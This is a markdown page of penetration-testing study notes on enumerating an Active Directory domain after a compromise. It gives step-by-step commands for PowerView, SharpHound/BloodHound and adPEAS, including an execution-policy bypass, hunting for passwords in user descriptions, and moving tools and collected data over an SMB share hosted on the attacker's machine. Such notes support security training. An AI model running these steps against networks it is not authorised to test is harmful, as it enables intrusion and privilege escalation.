Skip to content

Latest commit

 

History

History
136 lines (78 loc) · 3.29 KB

attacking-ad-post-compromise-enumeration.md

File metadata and controls

136 lines (78 loc) · 3.29 KB

Attacking AD: Post-Compromise Enumeration

Introduction

  • Once you have a compromise, how can you enumerate the network and increase your overall level of access?

Tools

  • PowerView -- AD Enumeration tool (PowerShell)
  • BloodHound -- Graphical representation of AD environment
  • SharpHound -- BloodHound's collector
  • adPEAS -- Just a chad of a tool.

Make sure that you ALWAYS use a new and fresh version of BloodHound and SharpHound!

Repos

PowerView:

{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" %}

BloodHound:

{% embed url="https://github.com/BloodHoundAD/BloodHound/releases" %}

SharpHound (Collector):

{% embed url="https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" %}

adPEAS:

{% embed url="https://github.com/61106960/adPEAS" %}

PowerView

Step 1: Transfer PowerView.ps1 on the target machine

Step 2: Set Execution Policy -- powershell -ep bypass

Step 3: Dot Sourcing -- . .\PowerView.ps1

Step 4: Start running commands!

Step 5: Get-NetDomain

Step 6: Get DC Info -- Get-NetDomainController

Step 7: Show domain policies -- Get-DomainPolicy

Step 8: User Info -- Get-NetUser

or just grab a list of domain users -- Get-NetUser | select samaccountname

Look for password in user descriptions -- Get-NetUser | select description

Step 9: Find Shares -- Invoke-ShareFinder

Step 10: Look at Group Policies -- Get-NetGPO | select displayname, whenchanged

Cheat Sheet

{% embed url="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" %}

BloodHound

Run Neo4j:

neo4j console

Run BloodHound:

bloodhound
  • Type in username and password

Grab Data w/ Invoke-BloodHound (Collector)

  • You can utilize the PowerShell version of SharpHound for Invoking (SharpHound.ps1)

Transfer SharpHound to your target:

Kali: 

impacket-smbserver smb . -smb2support

Windows: 

net use \\kali-ip\smb
copy \\kali-ip\smb\SharpHound.ps1

Invoke-BloodHound:

. .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All
  • It will generate a zip file
  • Obtain this zip file from the SMB file share that you created and drag and drop it into BloodHound

Enumerating Domain Data w/ BloodHound

  • Be sure to load up the pre-build queries and see what we have to do to get to DA
  • Be sure to right-click on items for help with exploitation!

Should we look into custom queries?

{% embed url="https://github.com/hausec/Bloodhound-Custom-Queries" %}

Things to keep in mind:

  • You use PowerView to look for users, groups, group policies, computers, etc.
  • BloodHound to look at administrators, high value targets, which members are administrators, etc.

adPEAS

Step 1: Transfer script to Windows target (SMB server)

Step 2: Import and Invoke

Import-Module .\ADPeas.ps1

Invoke-ADPeas

Step 3: Go through slowly